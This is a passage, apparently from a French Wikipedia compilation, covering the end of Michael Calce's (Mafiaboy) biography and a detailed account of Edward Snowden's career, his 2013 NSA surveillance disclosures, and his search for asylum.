avec un autre membre du groupe de hackers dont il faisait partie (TNT). Au départ, il nia avoir commis des cyberattaques, disant qu'il ne faisait que des tests afin de créer un meilleur pare-feu. Cependant, il changea son plaidoyer le premier jour du procès et plaida coupable à 56 des 66 chefs d'accusation qui pesaient contre lui. Il fut condamné à huit mois dans un centre de détention pour jeunes. Ces attaques, en plus du préjudice financier à des multinationales américaines évalué à 1,7 milliard, ont montré le besoin d'améliorer la cybersécurité. Comme l'exigeait la loi, son identité réelle fut tenue secrète lors de son arrestation et de son procès, puisqu'il était mineur. Le policier de la GRC qui l'a mis en état d'arrestation lui a proposé de travailler au renforcement de la sécurité sur Internet. Mafiaboy n'a jamais voulu contacter ce policier à cause de la manière dont il aurait traité son « Michael Calce 403

œuvre criminelle ». Depuis le 21 septembre 2005, Mafiaboy écrit des articles sur la cybersécurité pour Le Journal de Montréal. En 2008, Michael Calce est sorti de l'ombre avec une œuvre autobiographique portant principalement sur ses attaques informatiques. Il est passé à l'émission télévisée de Radio-Canada, Tout le monde en parle, le 26 octobre 2008, et y a avoué ne plus vouloir être identifié sous le nom de Mafiaboy, mais plutôt par son vrai nom, Michael Calce, affirmant du même coup que Mafiaboy était mort. Il a également affirmé ne pas avoir commis ces attentats dans le but de s'enrichir mais uniquement pour s'amuser et tester ses capacités. Il travaille désormais dans une PME vendant aux usagers d'ordinateurs des programmes pour contrer les cybercriminels.

Bibliographie (en) Michael Calce, Mafiaboy: How I Cracked the Internet and Why It's Still Broken, Viking Canada, 30 septembre 2008, 277 p. (ISBN 0-670-06748-2 et 978-0670067480)

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Michael_Calce& action=edit

Edward Snowden

Pour les articles homonymes, voir Snowden. Edward Snowden

Edward Snowden lors de son interview par Glenn Greenwald et Laura Poitras, le 6 juin 2013 à Hong Kong. Edward Snowden 404

Données clés

Nom de Edward Joseph Snowden naissance

Naissance 21 juin 1983 Elizabeth City, Caroline du Nord, États-Unis

Nationalité Américaine

Profession Informaticien

Activité Administrateur systèmes chez Booz Allen Hamilton (jusqu'au 10 juin 2013) principale

Autres activités Révélateur des programmes de surveillance électronique (PRISM) de citoyens, d'entreprises et d'États par les agences de renseignements américaines (NSA, FBI) et britanniques (GCHQ)

Edward Joseph Snowden, né le 21 juin 1983[1], est un informaticien américain, ancien employé de la CIA et de la NSA[2],[3], en tant qu'employé de divers sous-traitants, dont Dell ou Booz Allen Hamilton, son dernier employeur[4]. En juin 2013, Snowden rend publiques par l'intermédiaire des médias, notamment du Guardian[5] et du Washington Post[6], des informations classées top-secrètes de la NSA concernant la captation des métadonnées des appels téléphoniques aux États-Unis, ainsi que le système d'écoute sur internet du programme de surveillance PRISM du gouvernement américain[7],[8]. Justifiant ces révélations, il indique que son « seul objectif est de dire au public ce qui est fait en son nom et ce qui est fait contre lui »[9]. Suite à ses révélations, Edward Snowden est inculpé le 22 juin 2013 par le gouvernement américain sous les chefs d’accusation d'espionnage, vol et utilisation illégale de biens gouvernementaux[10],[11].

Biographie

Famille et éducation Edward Snowden nait le 21 juin 1983 à Elizabeth City en Caroline du Nord, mais passe toute son enfance dans la ville de Wilmington[12]. Son père, Lonnie Snowden, originaire de Pennsylvanie, est un ancien officier de la garde côtière des États-Unis[13]. Sa mère, Wendy, originaire de Baltimore, Maryland, travaille à la cour fédérale du district du Maryland. Il a une sœur plus âgée que lui, qui est avocate[12],[14]. En 1999, Edward déménage avec sa famille à Ellicott City dans le Maryland, où il étudie l'informatique à l'université Anne Arundel Community College (en)[12], pour obtenir les crédits nécessaires à l'obtention d'un diplôme d'études secondaires. À Crofton, Maryland (en), où il habite, presque tout le monde travaille pour l'armée ou la NSA, dont le quartier général est non loin à Fort Meade[15]. Snowden est visiblement très intelligent mais pas bon élève : il ne finit pas sa licence à Arundel[16], échec dont il sortira mortifié et peut-être un peu paranoïaque sur les institutions incarnant une autorité[15]. Son père explique qu'Edward a raté plusieurs mois d'école pour cause de maladie, et, plutôt que de retourner passer son GED dans un lycée local — qu'il a par la suite obtenu[17] — il préfère suivre des cours en ligne afin d'obtenir une maitrise à l'Université de Liverpool, en 2011[18]. Ayant travaillé dans une base militaire américaine au Japon, Edward Snowden aurait eu à cette occasion un intérêt profond pour la culture japonaise et aurait étudié cette langue [19]. Snowden a également affirmé qu'il avait une compréhension de base du mandarin, qu'il était profondément intéressé par les arts martiaux et a revendiqué le bouddhisme comme étant sa religion[20]. Avant de fuir pour Hong Kong, Snowden résidait à Honolulu, Oahu, sur l'archipel d'Hawaï[21]. Il avait visité Hong Kong auparavant avec Lindsay Mills, sa petite amie[22]. Le 17 juin 2013, Lonnie Snowden accorde une interview à Fox TV, étant préoccupé par la désinformation dans les médias concernant son fils. Il décrit Edward comme étant « un jeune homme attentionné et sensible, doté d'une Edward Snowden 405

profonde réflexion »[18]. Alors qu'il est en accord avec son fils dans son opposition aux programmes de surveillance qu'il a révélés, Lonnie Snowden demande à son fils d'arrêter de fuir et rentrer à la maison[18].

Convictions politiques En juin 2013, Edward Snowden est photographié avec un ordinateur portable orné d'autocollants à l'effigie d'associations promouvant un internet libre, comme l'Electronic Frontier Foundation ou le réseau Tor[23]. À l'élection présidentielle américaine de 2008, il dit avoir voté pour un « Tiers parti », sans préciser lequel. En 2008 il est prêt à faire ses révélations, mais il décide d'attendre à cause de l'élection de Barack Obama. Snowden dit qu'à cette période il « croyait aux promesses d'Obama », mais que celui-ci « a continué les pratiques de son prédécesseur »[24]. Concernant l'élection présidentielle américaine de 2012, les listes de donateurs aux politiques indiquent qu'il a contribué à la primaire de Ron Paul, candidat du Parti libertarien[25].

Carrière

Le 7 mai 2004, Edward Snowden s'engage dans l'armée en tant que recrue des forces spéciales. Il dit vouloir combattre pendant la guerre d'Irak, parce, disait-il, il « se sentait obligé en tant qu'être humain d'aider les peuples libres contre l'oppression ». Cependant, quatre mois plus tard, un accident pendant un entrainement lui brise les deux jambes et l'oblige à abandonner sa formation. Il est par la suite embauché par la NSA comme agent de sécurité à l'Université du Maryland, avant de rejoindre la CIA pour travailler dans la sécurité informatique[26].

De mars 2007 à février 2009[], Snowden est envoyé par la CIA à la mission américaine des Nations unies à Genève en Suisse[]. Il décrit cette expérience à

Genève comme étant « formatrice ». Par exemple, il raconte que la CIA a Photo non-datée d'Edward délibérément rendu saoul un banquier suisse, puis l'a encouragé à rentrer chez lui Snowden, attachée à une demande en voiture. Quand ce dernier a été arrêté, un agent de la CIA lui aurait alors offert formulée par les États-Unis pour son extradition, préparée par son aide, puis l'aurait recruté. Le président de la Confédération suisse, Ueli Maurer, l'ambassade américaine à Caracas, a commenté ce témoignage : « Il ne me semble pas que cet incident se soit déroulé Venezuela. de la façon dont Snowden et les médias la décrivent ». Ces révélations sont arrivées à un moment particulier dans les relations États-Unis–Suisse, puisque le Conseil fédéral suisse tentait d'adopter une loi pour plus de transparence dans le secteur bancaire. Snowden a justifié cette révélation en disant « je ne veux pas vivre dans une société qui pratique ce genre de choses »[27],[28].

En 2009, Snowden quitte la CIA pour travailler chez un prestataire privé de la NSA sur une base militaire américaine au Japon. Le directeur de la NSA, Keith B. Alexander a confirmé que Snowden a eu un poste à la NSA pendant un an, avant de devenir consultant[29]. Snowden travaille ensuite pour Booz Allen Hamilton pendant trois mois, en tant qu'administrateur systèmes pour la NSA, au Centre de renseignement régional SIGINT de Kunia Camp, Hawaii (en) à Oahu, une des îles de l'archipel d'Hawaï[30]. Snowden décrit sa vie comme très confortable, gagnant un salaire annuel d'environ 200 000 dollars avant son emploi chez Booz Allen Hamilton[31]. Dans un entretien avec le quotidien de Hong Kong le South China Morning Post, réalisé le 12 juin 2013, mais publié seulement le 25 juin 2013, Snowden affirme avoir cherché un emploi chez Booz Allen Hamilton afin de recueillir des preuves des activités de la NSA : « Mes fonctions au sein de Booz Allen Hamilton me donnaient accès aux listes des appareils [ordinateurs, téléphones portables] espionnées à travers le monde par la NSA ». « C’est pour ça que j’ai accepté le poste il y a trois mois », a-t-il expliqué[32]. Edward Snowden 406

Snowden travaillait à Hawaï depuis un mois lorsqu'il dérobe des informations ultraconfidentielles à l'aide d'une clé USB[33]. Il les transporte ensuite à l'aide de quatre ordinateurs portables jusqu'à Hong Kong, où il se réfugie du 20 mai 2013[33]au 23 juin 2013, date de son départ en direction de Moscou. Son travail d'administrateur systèmes lui donnait un accès facile au réseau des ordinateurs de la NSA. D'après le Los Angeles Times, le technicien savait parfaitement comment échapper au contrôle opéré afin d'éviter tout téléchargement illégal de documents officiels[34]. Snowden est licencié de chez Booz Allen Hamilton le 10 juin 2013, suite, selon ses employeurs, à une « violation du code d'éthique et de la politique de l'entreprise »[35],[36] Quand Snowden quitte les États-Unis en mai 2013, après la perte de son travail qui lui assurait un mode de vie privilégié, il explique : « Je suis prêt à sacrifier tout cela parce que je ne peux, en mon âme et conscience, laisser le gouvernement américain détruire la vie privée, la liberté d'Internet et les libertés essentielles pour les gens tout autour du monde avec ce système énorme de surveillance qu'il est en train de bâtir secrètement »[37],[38].

Les révélations

Contacts avec les journalistes En janvier 2013, Edward Snowden a pris contact anonymement avec la documentariste Laura Poitras[]. Il commence par établir une méthode de communication sécurisée, demandant à la journaliste sa clé de chiffrement. Il prétend alors avoir des informations intéressantes à partager dans le domaine du renseignement. Snowden ne fournissant pas de documents à cette étape, Laura Poitras a besoin d'évaluer la fiabilité de cette source inconnue, elle en parle donc à quelques personnes, dont Barton Gellman, qui l'aident à s'assurer de la crédibilité de ce contact anonyme. Selon elle, Snowden a choisi de la contacter après avoir vu un de ses articles dans le New York Times sur William Binney (en), un autre dénonciateur des programmes d'espionnage de la NSA, en 2002. Elle fait partie de la Freedom of the Press Foundation (en), tout comme le journaliste Glenn Greenwald ou le célèbre dénonciateur Daniel Ellsberg. En juin 2013, elle est à Hong Kong et réalise un documentaire sur les dénonciateurs et les fuites d'informations[39]. Glenn Greenwald, journaliste au Guardian, prétend travailler avec Snowden depuis février 2012[40]. Le 5 juin 2013 il publie un premier article concernant les activités d'espionnage de la NSA : l'espionnage massif des appels téléphoniques de l'opérateur Verizon. Barton Gellman (en), un journaliste du Washington Post, dit qu'il a établi un premier contact avec Snowden le 16 mai 2013. Gellman affirme que Greenwald a été impliqué seulement après que le Washington Post ait renoncé à garantir la publication complète des documents dans les soixante-douze heures, mais Greenwald dément cette chronologie des faits[41],[40]. Gellman raconte qu'il aurait dit à Snowden « nous n'apportons aucune garantie sur ce que nous allons publier ou sur la date de cette publication » et Snowden aurait répondu « je regrette que nous ne puissions Le logo de PRISM pas poursuivre ce projet ». Peu après Glenn Greenwald aurait été contacté. Le 6 juin 2013, Gellman publie avec Poitras le premier article du Washington Post révélant le programme de surveillance PRISM[42].

Snowden communique par email de façon chiffrée[], il utilise le pseudonyme « Verax » qui signifie « véridique » ou « celui qui dit la vérité » en latin. Au départ, il demandait à ne pas être cité par de trop longues phrases par peur d'être identifié par analyse sémantique[]. Selon Gellman, avant de le rencontrer en personne, Snowden lui a écrit « Je comprends que je vais avoir à répondre de mes actions, et que ces révélations publiques marquent la fin de ma vie telle qu'elle a été ». Il a aussi dit à Gellman que tant que les articles ne sont pas publiés, les journalistes travaillant avec lui sont en danger vis-à-vis des agences d'espionnage américaines. Selon Snowden, ces agences de renseignement seraient même prêtes à tuer une personne si elles pensent que cela peut empêcher des révélations embarrassantes[43]. Edward Snowden 407

L'identité d'Edward Snowden est révélée publiquement, à sa demande, par le Guardian et le Washington Post le 9 juin 2013[44]. Il explique ce souhait de renoncer à l'anonymat en ces termes : « Je n'ai pas l'intention de me cacher parce que je sais que je n'ai rien fait de mal ».

Historique des révélations • Le 5 juin 2013, The Guardian révèle l’existence d’une ordonnance de justice secrète, forçant l'opérateur téléphonique américain Verizon — et vraisemblablement d’autres opérateurs — à livrer à la NSA, à la demande du FBI, la totalité des données téléphoniques de ses abonnés, d’avril à juillet 2013[9],[38]. • Le 6 juin 2013, le Guardian et le Washington Post révèlent le programme de surveillance PRISM qui permettrait au FBI et à la NSA de surveiller les internautes. Ils utiliseraient pour cela des portes d'entrée cachées dans les logiciels fabriqués par les principales entreprises informatiques américaines, et accèderaient aux serveurs de neuf d'entre elles, dont Microsoft, Yahoo!, Google, Facebook et Apple[38],[],[]. Parmi les informations qu'il a dérobées, on trouve une présentation PowerPoint sur le fonctionnement du programme PRISM, normalement destinée aux employés de la NSA[34]. • Le 8 juin 2013, le Guardian révèle l’existence de Boundless informant, un système informatique d'analyse, de tri et de visualisation des données collectées par la NSA[]. • Le 12 juin 2013, dans une interview au quotidien de Hong Kong le South China Morning Post, Edward Snowden déclare que les agences de renseignement américaines s’introduisent dans les grands axes chinois de communication « tels que les routeurs Internet, qui donnent accès aux communications de centaines de milliers d’ordinateurs sans avoir besoin d’en pirater un seul ». Il a en outre indiqué que plus de 61 000 opérations avaient été jusqu’ici engagées par la NSA[36]. Le quotidien de Hong Kong affirme avoir consulté un extrait des dossiers détenus par Snowden au cours de l'interview[45]. Y figurent les adresses IP visées et la date des infractions, identifiant des cibles de piratage à Hong Kong et en Chine[46]. Selon le journal, les documents permettent de savoir si une opération est en cours ou conclue, et semblent indiquer un taux de réussite des tentatives d'intrusion de 75 %. « J'ignore les informations spécifiques qu'ils cherchaient sur ces machines, je sais seulement qu'utiliser des moyens techniques pour pénétrer sans autorisation dans des appareils civils est une violation du droit et c'est éthiquement douteux », leur a déclaré Snowden[46]. • Le 17 juin 2013, le Guardian révèle[47], grâce aux documents fournis par Snowden, que le Royaume-Uni a mené une large opération d'espionnage des communications des participants au G20 de Londres en avril et septembre 2009[48]. Selon les documents consultés par The Guardian, le Government Communications Headquarters (GCHQ), le service de renseignement électronique du gouvernement britannique, a eu accès aux communications Internet et téléphoniques des participants, une équipe de quarante-cinq personnes était affectée, vingt-quatre heures sur vingt-quatre, à cette vaste opération de surveillance. Celle-ci incluait notamment le piratage des ordinateurs utilisant les connexions Internet sans fil dans des cafés, leur permettant d'intercepter des courriels. Les Britanniques ont également eu accès aux e-mails et aux appels passés depuis les téléphones mobiles de marque BlackBerry des participants[49],[50]. • Le 21 juin 2013, Snowden affirme au Guardian que les autorités britanniques espionneraient les liaisons téléphoniques et informatiques transitant par des câbles à fibre optique[51],[52] transatlantiques qui relient les États-Unis à l'Europe, ceux-ci pouvant délivrer jusqu'à 21 petaoctets de données par jour[53]. Baptisé Tempora, ce projet, en place depuis un an et demi, permettrait au GCHQ de conserver durant trente jours les données « puisées » dans les câbles, tels que des emails, des messages Facebook, ou un historique des recherches d'un internaute. Les résultats de ces écoutes seraient transmis à la sécurité intérieure américaine, la NSA[11]. • Le 23 juin 2013, le quotidien de Hong Kong le South China Morning Post révèle que les États-Unis auraient piraté des entreprises chinoises de téléphonie mobile dans le but de collecter des millions de SMS. La NSA aurait également piraté le système informatique de l'Université Tsinghua à Pékin, ainsi que l'opérateur asiatique de fibre Edward Snowden 408

optique Pacnet (en) en 2009. Le journal chinois affirme que Snowden lui a fourni des documents détaillés attestant de ces faits sur une période de quatre années[54],[]. • Le 27 juin 2013, le Guardian révèle que l'administration Obama a autorisé la NSA à poursuivre la collecte de vastes volumes de données détaillant l'usage d'internet et de la messagerie électronique des citoyens américains[]. • Le 29 juin 2013, le Washington Post publie quatre nouvelles diapositives de présentation du programme PRISM qui montrent qu'il permet de surveiller en temps réel les emails, les communications par « chat », la participation à des forums de discussion, la diffusion de photos et de vidéos et les appels téléphoniques de « cibles ». À la date du 5 avril 2013, il y avait 117 675 « cibles » du surveillance au titre de « contre-terrorisme » dans la base de données de PRISM[]. • Toujours le 29 juin 2013, l’hebdomadaire allemand Der Spiegel affirme que la NSA espionnait, dans le cadre du programme de surveillance PRISM, plusieurs bureaux de l'Union européenne : les représentations diplomatiques à Washington et aux Nations unies, mais aussi le Conseil européen à Bruxelles[]. « Il y a cinq ans, les services de sécurité européens ont constaté l’existence d’un système d’écoutes et d’espionnage sur le bâtiment Justus Lipsius, siège du Conseil de l’UE, qui remontait jusqu’au QG de l’Otan [dans la banlieue de Bruxelles] », écrit le Spiegel[55]. D’après un document classé « strictement confidentiel » et daté de septembre 2010, la NSA a implanté du matériel d'écoute dans les bureaux de l'UE à Washington et aux Nations unies, et était en mesure, non seulement, d'écouter les conversations téléphoniques, mais aussi d'accéder aux documents et aux e-mails des diplomates européens, qualifiés de « cibles » dans le document[],[56]. Un système d'écoute aurait été implanté sur un cryptofax à l'ambassade de l'UE à Washington. La machine est utilisée pour envoyer des câbles de retour aux ministères des affaires étrangères dans les capitales européennes, rapportent les documents de la NSA[57]. « En plus des adversaires idéologiques traditionnels et des pays sensibles du Moyen-Orient, la liste de cibles inclut les missions de l'UE et les ambassades de France, d'Italie et de Grèce, ainsi qu'un certain nombre d'alliés des États-Unis, dont le Japon, le Mexique, la Corée du Sud, l'Inde et la Turquie », écrit le Guardian[58]. Le document « détaille une gamme extraordinaire de méthodes d'espionnage utilisées contre chacune de ces cibles, allant de micros dissimulés dans des équipements électroniques de communication à des branchements sur des câbles ou à la collecte de transmissions au moyen d'antennes spéciales », ajoute le quotidien britannique[57]. • Le 7 juillet 2013, le journal brésilien O Globo révèle que la NSA a surveillé les communications téléphoniques et électroniques de nombreuses entreprises et particuliers brésiliens au cours de la dernière décennie (2,3 milliards d'appels téléphoniques et d'emails interceptés en janvier 2013[],[]. Le Brésil était une priorité pour la NSA au même titre, que la Chine, la Russie, l'Iran et le Pakistan[]. Les documents communiqués par Edward Snowden montrent que la NSA a noué des « partenariats stratégiques » avec plus de 80 entreprises mondiales (opérateurs de télécommunications, fournisseurs d'accès Internet, infrastructure de réseau, équipements, systèmes d'exploitation et applications)[]. Les opérateurs téléphoniques américains, partenaires de la NSA, étaient eux-mêmes en relation d'affaires avec des opérateurs locaux, ce qui permettait à l'agence américaine d'avoir accès aux communications locales[]. La NSA récupérait les données brésiliennes et celles d'autres pays grâce aux systèmes Fairview (surveillance program) (en) et X-Keyscore[]. • Le 7 juillet 2013 également, dans un entretien publié par l'hebdomadaire allemand der Spiegel, Snowden explique que la NSA « travaille main dans la main avec les Allemands et la plupart des autres États occidentaux »[59]. Par exemple, dans le cadre de la coopération entre la NSA et le BND, les services de renseignement allemands, Snowden indique que la NSA fournit aux Allemands « des outils d'analyse » pour les informations passant par l'Allemagne, en provenance de régions comme le Proche et Moyen-Orient et dont le contenu est étudié au cœur du quartier général du BND, à Pullach, près de Munich[60]. Les Allemands craignent aujourd'hui que ces données Edward Snowden 409

ne leur aient totalement échappé, au profit de leurs partenaires américains ; les services allemands pourraient ainsi avoir remis indirectement aux Américains une multitude de données et de communications en provenance de ces pays[60]. Évoquant le rôle du Directorat aux affaires étrangères de la NSA, Snowden indique que le partenariat entre la NSA et les autres pays est conçu de façon à « protéger leurs dirigeants politiques de l'indignation publique », si « la façon dont ils violent largement la vie privée dans le monde » est rendue publique[61],[60]. Le magazine allemand s'inquiète également d'autres failles au sein des services de sécurité, dans le cadre de deux projets sur le sol allemand. Le premier projet prévoit la construction d'une base américaine en Allemagne, dédiée au renseignement. Le second projet est un nouveau centre d'analyse du renseignement allemand, en cours de construction à Wiesbaden. « Des installations qui sont exclusivement construites par des citoyens américains détenant des accès sécurisés », conclut le Spiegel[60]. • Le 12 juillet 2013, The Guardian publie un article qui détaille la coopération entre la compagnie Microsoft et les autorités gouvernementales américaines pour permettre le bon fonctionnement du programme de surveillance PRISM. Ainsi, les e-mails des services Hotmail, Live, et Outlook.com collectés par PRISM le sont avant leur cryptage. Microsoft et le FBI ont développé une solution permettant l'interception des chats cryptés d'Outlook.com avant que ce service ne soit lancé publiquement, une solution pour permettre l'accès via PRISM au service de stockage en ligne SkyDrive sans autorisation séparée, et travaillent ensemble pour comprendre les implications de la fonctionnalité de pseudonymes pour e-mails d'Outlook.com qui pourraient affecter le processus de requêtes de renseignements. L'article cite un document de la NSA de juillet 2012 vantant qu'une nouvelle capacité avait triplé la quantité d'appels vidéo Skype collectée par PRISM (Microsoft dit n'avoir fait aucun changement à Skype à cette époque pour permettre la collecte via PRISM). Dans un communiqué au Guardian, Microsoft rappelle qu'elle n'obéit qu'aux demandes du gouvernement en conformité avec la loi, et que quand elle introduit ou met à niveau un produit, des obligations légales peuvent l'obliger de maintenir la capacité à répondre à des demandes gouvernementales[].

Détails • Le 17 juin 2013, répondant en direct aux questions des lecteurs du Guardian[31], Snowden indique que « [...] d'une manière générale, la réalité est la suivante : si la NSA, le FBI, la CIA, la DIA (Defense Intelligence Agency) et d'autres veulent interroger des bases de données brutes de renseignement électronique, ils peuvent « entrer » et obtenir ce qu'ils veulent. Numéros de téléphones, mails, identifiants, numéro unique d'un téléphone portable (numéro IMEI)... Tout ça, c'est pareil. Les restrictions portées à cet accès sont de nature politiques, et non techniques ; elles peuvent changer à tout moment. En plus de ça, les protocoles d'accès sont superficiels, incomplets et facilement falsifiables avec de fausses justifications. Pour les seuls renseignements britanniques GCHQ, 5 % seulement des requêtes émises le sont avec un protocole d'accès vérifié. »[62]. • Concernant les données surveillées et conservées par la NSA, Snowden assure que « en raison du Foreign Intelligence Surveillance Act (FISA), les communications des Américains sont collectées et vérifiées tous les jours, grâce à la validation d'un analyste de la NSA et non grâce à un « mandat ». La masse de données collectées est pour eux quelque chose de secondaire, mais à la fin de la journée, quelqu'un a bien encore accès à l'intégralité de vos communications. [...] Il est important de comprendre que les services de renseignement n'agissent pas toujours en vertu de ce qu'on pourrait considérer comme un « vrai » mandat, comme ceux, par exemple, utilisés par la police. Les « mandats » qu'ils utilisent ont davantage l'aspect d'un formulaire que quelqu'un remplit et envoie ensuite à un juge avec un tampon. »[62]. Edward Snowden 410

Fuite et recherche d'un pays d'exil

Réfugié à Hong Kong

Ayant fui son pays[3], Edward Snowden était, depuis le 20 mai 2013[63], réfugié au sein de la région administrative spéciale (RAS) de Hong Kong en Chine[3],[64],[65],[66]. Parmi les cibles de la NSA, des centaines sont visées depuis 2009 à Hong Kong ou en Chine, a affirmé Snowden, qui dit agir notamment pour dénoncer « l'hypocrisie du gouvernement américain quand il assure qu'il n'espionne pas d'infrastructures civiles, au contraire de ses adversaires »[63].

À Hong Kong, Edward Snowden a demandé aux avocats qui le Panorama urbain de la ville de Hongkong. secondaient de mettre leur téléphone portable dans le frigidaire de sa planque, rapporte The New York Times[67]. Objectif : « Bloquer toute écoute », non grâce au froid mais grâce à l’effet cage de Faraday : les épaisses parois de métal du réfrigérateur créent une sorte de barrière électromagnétique empêchant le passage des ondes radio et la transmission de données, explique un expert, Adam Harvey[68], dans le quotidien américain[67]. Toutefois, l'utilisation d'un simple shaker semble plus efficace pour bloquer les ondes électromagnétiques, selon Michael Colombo du site internet Makezine, qui a fait l'expérience comparative[69][70].

Alors qu'il est probable que la Chine refuse d'extrader Edward Snowden (Hong Kong a un accord d'extradition avec les États-Unis)[71], l'hebdomadaire français Le Nouvel Observateur reprend la question d'une éventuelle manipulation chinoise[72],[73] ; ce que dément Snowden le 17 juin 2013[74], lors d'une discussion en direct avec les lecteurs du Guardian[31]. Il ajoute : « Le gouvernement américain ne pourra pas étouffer [cette affaire] en m’emprisonnant ou en me tuant. La vérité est en marche et ne pourra pas être arrêtée », explique-t-il[75].

Réfugié à Moscou

Cette section est liée à un événement en cours (juillet 2013). Les informations peuvent fréquemment changer suivant l'évolution des évènements et de l'actualité.

Le 23 juin 2013, Edward Snowden embarque à bord d'un vol de la compagnie Aeroflot à destination de Moscou en Russie accompagné par Sarah Harrison (en) une conseillère de WikiLeaks[], bien que cela ne soit probablement pas sa destination finale[],[76]. Le gouvernement de Hong Kong confirme l'information : « Aujourd'hui, Snowden a quitté Hong Kong volontairement pour un pays tiers de façon légale et normale », affirme un porte-parole. Les autorités hongkongaises n'ont, selon elles, « pas obtenu d'informations pertinentes » justifiant l'arrestation de l'américain comme le demandaient les États-Unis[33],[76]. Ce même jour, afin de l'empêcher de voyager, le gouvernement américain révoque son passeport[77]. À son arrivée à l'aéroport international Cheremetievo de Moscou, Snowden rencontre brièvement un diplomate de l'ambassade de l'Équateur à Moscou, le ministre des Affaires étrangères équatorien annonçant pour sa part que Snowden a demandé l'asile politique dans son pays[78],[79],[80]. Edward Snowden 411

Edward Snowden a officiellement demandé l'asile au gouvernement équatorien, dans une lettre rendue publique par la presse locale[81] le 25 juin 2013 : « Moi, Edward Snowden, citoyen des États-Unis d'Amérique, je vous écris pour solliciter l'asile à la république de l’Équateur, face au risque de persécution de la part du gouvernement des États-Unis et de ses agents en relation avec ma décision de rendre publiques de graves violations de la part du gouvernement des États-Unis d'Amérique de leur Constitution – concrètement du quatrième et du cinquième amendement – ainsi que de plusieurs traités Voiture diplomatique de l'ambassade d'Équateur devant l'aéroport international Cheremetievo de des Nations unies souscrits par mon pays ». « (...) Je crois qu'il est Moscou, le 23 juin 2013. improbable que je reçoive un traitement humain avant le procès et je cours en plus le risque d'une condamnation à perpétuité ou la mort »[82].

Selon un cadre de la compagnie Aeroflot cité par l'agence Reuters, Snowden a réservé un siège sur un vol à destination de La Havane. D'après une journaliste de Reuters, qui se trouve sur ce vol, l'ex-agent ne se trouve toutefois pas à bord[80]. Le site WikiLeaks fondé par Julian Assange a annoncé que Snowden était « en route pour la République d'Équateur par un chemin sûr afin d'obtenir l'asile »[83]. Le 25 juin 2013, le président russe Vladimir Poutine déclare qu'Edward Snowden est toujours dans la zone de transit de l'aéroport Cheremetievo ; son arrivée à Moscou étant, a-t'il affirmé, « totalement inattendue »[84]. La présence de Snowden dans la zone de transit cause un début de crise diplomatique entre les États-Unis et la Russie[85],[86],[], les Américains souhaitant que les Russes extradent de force Snowden vers les États-Unis, les Russes faisant état que : « Les Américains ont mis en connaissance de cause Moscou dans l'embarras en n'avertissant pas à temps de l'annulation du passeport » d'Edward Snowden, a affirmé le 28 juin 2013 une source proche du dossier à l'agence russe Interfax. « Si cela avait été su plus tôt, il est possible que Snowden n'aurait jamais décollé pour Moscou, et il n'y aurait pas eu toute cette histoire », a ajouté la source[86].

Dans une interview donnée à la chaîne NBC le 28 juin 2013[87], le père d'Edward Snowden a déclaré que son fils était prêt à envisager un retour sur le sol américain s'il obtient certaines garanties[88]. Par l'intermédiaire de son avocat, Lonnie Snowden a adressé une lettre à Eric Holder, le ministre américain de la Justice. Il y explique que son fils est prêt à rentrer aux États-Unis à condition qu'il ne soit pas arrêté avant son procès. Il demande également qu'il puisse choisir le lieu où il sera jugé et qu'il ne soit pas tenu au silence. Selon NBC, les deux hommes ne se seraient pas parlé depuis avril dernier[89]. Le 30 juin 2013, selon un responsable des services consulaires russes et l'agence Reuters, Edward Snowden aurait demandé l'asile politique à la Russie. Le lendemain, ce responsable russe précise : « La veille à 22 h 30, la citoyenne britannique Sarah Harrison (membre de WikiLeaks voyageant avec M. Snowden) s'est présentée au service consulaire de l'aéroport de Cheremetievo et a transmis une demande d'asile politique de Snowden en Russie »[90].

Le 2 juillet 2013, le président russe, Vladimir Poutine déclare que Terminal F de l'aéroport international Snowden pourrait rester en Russie uniquement s’il cessait « ses Cheremetievo de Moscou, le 24 juin 2013. activités visant à faire du tort » aux Américains. « Comme il se considère comme un défenseur des droits de l'homme, il n’a manifestement pas l’intention de cesser ces activités, c’est pourquoi il doit choisir un pays où aller, et s’y rendre », a-t-il ajouté. Le porte-parole du gouvernement russe Dmitri Peskov (en) a ajouté que Snowden ne pouvait être remis aux États-Unis, où la peine de mort est en vigueur : « Aucun pays ne peut livrer Snowden à un autre pays comme les États-Unis où est appliquée la peine de mort » [] Edward Snowden 412

Le 2 juillet 2013, Wikileaks annonce qu'Edward Snowden a fait une demande d'asile à vingt et un pays dont l'Islande, l'Allemagne, la France, l'Inde, la Chine, Cuba, l'Équateur ou encore le Brésil[91],[92]. Ces nouvelles demandes font suite à la réticence de l'Équateur quant à l’accueil de l'ancien agent de la NSA, réticences engendrées par la forte pression exercée par les États-Unis pour empêcher Snowden, comme il le dit lui-même[93][94], de trouver une terre d'asile[95]. « Ce type de méthode de la part d'un leader mondial n'est pas la justice… Il s'agit des vieux instruments d'agression politique », ajoute-t-il[96]. À cette période, Snowden renonce à demander l’asile politique en Russie[97] et dénonce l’attitude de l’administration Obama à son égard : « Bien que je ne sois déclaré coupable de rien, [l'administration Obama] a unilatéralement annulé mon passeport, faisant de moi un apatride ». « Sans aucune décision de justice, cette administration tente à présent de m'empêcher d'exercer un droit fondamental, un droit qui appartient à tout le monde, le droit de demander asile »[98]. À ce sujet, Le porte-parole du Kremlin, Dmitri Peskov (en), déclare à des journalistes : « En apprenant hier la position de Poutine sur les conditions nécessaires pour rester en Russie, il a renoncé à sa demande »[99]. Le 3 juillet 2013, comme l'Italie, le Portugal et l'Espagne, La France ferme brutalement son espace aérien, en raison de rumeurs selon lesquelles Edward Snowden se trouverait à bord de l'avion du président de Bolivie Evo Morales, qui revenait d'une conférence à Moscou[100]. Ce refus de survol de son espace aérien provoque un scandale en Bolivie, où des manifestants boliviens en colère s'attaquent à l'ambassade de France en Bolivie de La Paz[101]. La Bolivie et les pays d'Amérique latine sont furieux et déposent plainte à l'ONU. La France refuse d'expliquer pourquoi elle a interdit pendant plusieurs heures le survol de son pays[102]. Le soir du 3 juillet 2013, Paris fait part à la Bolivie de ses « regrets », évoquant un « contretemps », le porte-parole du ministère de Laurent Fabius indiquant que « Le ministre des affaires étrangères a téléphoné à son homologue bolivien pour lui faire part des regrets de la France suite au contretemps occasionné pour le président Morales par les retards dans la confirmation de l'autorisation de survol du territoire par l'avion du président »[103]. Le 5 juillet 2013, le président du Venezuela, Nicolás Maduro, et le président du Nicaragua, Daniel Ortega, affirment tous les deux qu'ils sont disposés à accorder l'asile à l'ex-consultant Edward Snowden[104][105]. Nicolás Maduro, au cours d'une célébration de l'indépendance du Venezuela, annonce qu'il entend « le protéger de la persécution de l'empire le plus puissant 